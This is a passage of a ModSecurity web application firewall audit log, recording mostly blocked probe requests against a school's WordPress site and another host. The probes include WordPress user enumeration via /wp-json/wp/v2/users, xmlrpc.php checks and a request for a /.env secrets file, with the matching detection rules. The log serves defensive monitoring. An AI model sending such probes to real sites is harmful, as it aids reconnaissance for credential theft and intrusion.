"COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746698321422611 3524 (- - -) Stopwatch2: 1746698321422611 3524; combined=1514, p1=507, p2=968, p3=0, p4=0, p5=38, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --328c9d68-Z-- --93d4ba06-A-- [08/May/2025:17:10:10 +0700] aByDAis5rYyn3jlLjjIPfAAAANY 103.236.140.4 59052 103.236.140.4 8181 --93d4ba06-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.67 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --93d4ba06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93d4ba06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746699010960504 2905 (- - -) Stopwatch2: 1746699010960504 2905; combined=1425, p1=474, p2=919, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93d4ba06-Z-- --fdeb8569-A-- [08/May/2025:17:10:13 +0700] aByDBSs5rYyn3jlLjjIPfQAAAMw 103.236.140.4 59056 103.236.140.4 8181 --fdeb8569-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.67 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fdeb8569-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdeb8569-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746699013326198 2143 (- - -) Stopwatch2: 1746699013326198 2143; combined=1049, p1=351, p2=669, p3=0, p4=0, p5=29, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdeb8569-Z-- --8ccfe717-A-- [08/May/2025:17:10:15 +0700] aByDB8P9GxxPAbCroFYh5gAAAEE 103.236.140.4 59060 103.236.140.4 8181 --8ccfe717-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.67 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8ccfe717-C-- demo.sayHello --8ccfe717-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ccfe717-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746699015678350 17866 (- - -) Stopwatch2: 1746699015678350 17866; combined=29221, p1=474, p2=3470, p3=25, p4=25, p5=12627, sr=68, sw=63, l=0, gc=12537 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ccfe717-Z-- --f1b3946b-A-- [08/May/2025:17:10:29 +0700] aByDFacs1DvJ_HgMHE9WowAAABg 103.236.140.4 59064 103.236.140.4 8181 --f1b3946b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.67 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f1b3946b-C-- demo.sayHello --f1b3946b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1b3946b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746699029569779 5265 (- - -) Stopwatch2: 1746699029569779 5265; combined=4043, p1=501, p2=3320, p3=28, p4=31, p5=96, sr=75, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1b3946b-Z-- --a6265b09-A-- [08/May/2025:17:28:00 +0700] aByHMMP9GxxPAbCroFYiAwAAAEs 103.236.140.4 59152 103.236.140.4 8181 --a6265b09-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.10.29.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.10.29.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a6265b09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6265b09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746700080065818 2333 (- - -) Stopwatch2: 1746700080065818 2333; combined=1146, p1=360, p2=753, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6265b09-Z-- --87857502-A-- [08/May/2025:17:29:07 +0700] aByHc8P9GxxPAbCroFYiBgAAAEM 103.236.140.4 59160 103.236.140.4 8181 --87857502-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --87857502-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87857502-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746700147071120 3326 (- - -) Stopwatch2: 1746700147071120 3326; combined=1422, p1=492, p2=898, p3=0, p4=0, p5=32, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87857502-Z-- --abf1f934-A-- [08/May/2025:17:29:12 +0700] aByHeMP9GxxPAbCroFYiBwAAAFE 103.236.140.4 59164 103.236.140.4 8181 --abf1f934-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --abf1f934-C-- demo.sayHello --abf1f934-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --abf1f934-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746700152751174 7053 (- - -) Stopwatch2: 1746700152751174 7053; combined=5021, p1=683, p2=4088, p3=38, p4=42, p5=101, sr=143, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abf1f934-Z-- --7c0d6c7e-A-- [08/May/2025:17:41:56 +0700] aByKdMP9GxxPAbCroFYiIQAAAFc 103.236.140.4 59256 103.236.140.4 8181 --7c0d6c7e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7c0d6c7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c0d6c7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746700916870157 3042 (- - -) Stopwatch2: 1746700916870157 3042; combined=1274, p1=424, p2=821, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c0d6c7e-Z-- --718a9a6b-A-- [08/May/2025:17:42:02 +0700] aByKesP9GxxPAbCroFYiIwAAAEw 103.236.140.4 59260 103.236.140.4 8181 --718a9a6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.81 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --718a9a6b-C-- demo.sayHello --718a9a6b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --718a9a6b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746700922922204 5924 (- - -) Stopwatch2: 1746700922922204 5924; combined=4366, p1=557, p2=3585, p3=31, p4=34, p5=94, sr=74, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --718a9a6b-Z-- --eda08805-A-- [08/May/2025:17:44:32 +0700] aByLEKcs1DvJ_HgMHE9WqAAAAAw 103.236.140.4 59278 103.236.140.4 8181 --eda08805-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eda08805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eda08805-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746701072622972 3316 (- - -) Stopwatch2: 1746701072622972 3316; combined=1448, p1=509, p2=908, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eda08805-Z-- --55e6fe7e-A-- [08/May/2025:17:44:38 +0700] aByLFqcs1DvJ_HgMHE9WqgAAABM 103.236.140.4 59282 103.236.140.4 8181 --55e6fe7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --55e6fe7e-C-- demo.sayHello --55e6fe7e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --55e6fe7e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746701078392215 6665 (- - -) Stopwatch2: 1746701078392215 6665; combined=4749, p1=623, p2=3842, p3=71, p4=43, p5=101, sr=82, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55e6fe7e-Z-- --f9a2ab7b-A-- [08/May/2025:17:58:22 +0700] aByOTo4K347NtBcwXKxYRAAAAI4 103.236.140.4 59396 103.236.140.4 8181 --f9a2ab7b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 193.218.7.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.218.7.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f9a2ab7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9a2ab7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746701902940618 3124 (- - -) Stopwatch2: 1746701902940618 3124; combined=1289, p1=439, p2=819, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9a2ab7b-Z-- --b90e3575-A-- [08/May/2025:18:07:38 +0700] aByQesP9GxxPAbCroFYiTQAAAEw 103.236.140.4 59452 103.236.140.4 8181 --b90e3575-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.159.141.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.159.141.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b90e3575-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b90e3575-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746702458243997 3326 (- - -) Stopwatch2: 1746702458243997 3326; combined=1466, p1=513, p2=920, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b90e3575-Z-- --0d57b555-A-- [08/May/2025:18:10:37 +0700] aByRLcP9GxxPAbCroFYiTgAAAFI 103.236.140.4 59458 103.236.140.4 8181 --0d57b555-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0d57b555-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d57b555-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746702637000026 3334 (- - -) Stopwatch2: 1746702637000026 3334; combined=1502, p1=507, p2=963, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d57b555-Z-- --4af7cf31-A-- [08/May/2025:18:10:41 +0700] aByRMcP9GxxPAbCroFYiUAAAAEk 103.236.140.4 59462 103.236.140.4 8181 --4af7cf31-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.216 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4af7cf31-C-- demo.sayHello --4af7cf31-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4af7cf31-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746702641876858 5735 (- - -) Stopwatch2: 1746702641876858 5735; combined=4177, p1=540, p2=3410, p3=28, p4=31, p5=98, sr=72, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4af7cf31-Z-- --356f6b71-A-- [08/May/2025:18:40:49 +0700] aByYQY4K347NtBcwXKxa3wAAAIs 103.236.140.4 38888 103.236.140.4 8181 --356f6b71-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 45.148.10.172 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 45.148.10.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-N960F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --356f6b71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --356f6b71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746704449492010 797 (- - -) Stopwatch2: 1746704449492010 797; combined=322, p1=283, p2=0, p3=0, p4=0, p5=39, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --356f6b71-Z-- --04cc8666-A-- [08/May/2025:19:11:14 +0700] aByfYo4K347NtBcwXKxgawAAAJM 103.236.140.4 47896 103.236.140.4 8181 --04cc8666-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --04cc8666-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04cc8666-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 